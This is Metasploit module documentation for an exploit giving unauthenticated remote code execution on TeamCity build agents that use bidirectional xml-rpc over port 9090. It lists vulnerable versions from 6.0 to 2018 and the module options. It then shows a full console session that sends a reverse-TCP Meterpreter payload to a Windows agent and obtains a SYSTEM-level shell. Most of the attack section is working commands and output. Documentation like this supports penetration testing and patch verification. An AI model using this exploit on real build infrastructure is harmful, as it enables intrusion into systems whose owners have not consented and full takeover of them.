## Description

This module allows remote code execution on TeamCity Agents configured to use bidirectional communication via xml-rpc. In bidirectional mode the TeamCity server pushes build commands to the Build Agents over port TCP/9090 without requiring authentication. Up until version 10 this was the default configuration. This module supports TeamCity agents from version 6.0 onwards.

This module makes use of both a Windows and a Linux command stager. For Linux, the `echo` command stager flavor was replaced with the `printf` command stager flavor due to portability issues associated with `echo` and its options.

## Vulnerable Application

This module has been tested successfully with the following TeamCity Agent versions

* TeamCity 6.0
* TeamCity 6.5
* TeamCity 7.0
* TeamCity 8.0
* TeamCity 9.0
* TeamCity 10.0
* TeamCity 2017
* TeamCity 2018

## Verification Steps

1. `msfconsole`
2. `use exploit/multi/misc/teamcity_agent_xmlrpc_exec`
3. `set RHOSTS <rhost>`
4. `set payload <payload>`
5. `run`

## Options

**RPORT**

Which port the TeamCity Agent is listening on (default: 9090)

**CMD**

If specified the module will run the specified command instead of executing the payload

## Scenarios

### Windows Server 2012 R2 (x64) with TeamCity Agent 2018.1

```
msf > use exploit/multi/misc/teamcity_agent_xmlrpc_exec 
msf exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set RHOSTS 172.16.198.149
RHOSTS => 172.16.198.149
msf exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set LHOST eth0
LHOST => eth0
msf exploit(multi/misc/teamcity_agent_xmlrpc_exec) > run

[*] Started reverse TCP handler on 172.16.198.150:4444 
[*] Found TeamCity Agent running build version 58245
[*] Constructing Windows payload
[*] Found compatible build config for TeamCity build 58245
[*] Successfully sent build configuration
[*] Sending stage (179779 bytes) to 172.16.198.149
[*] Meterpreter session 1 opened (172.16.198.150:4444 -> 172.16.198.149:49178) at 2018-10-03 17:21:12 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
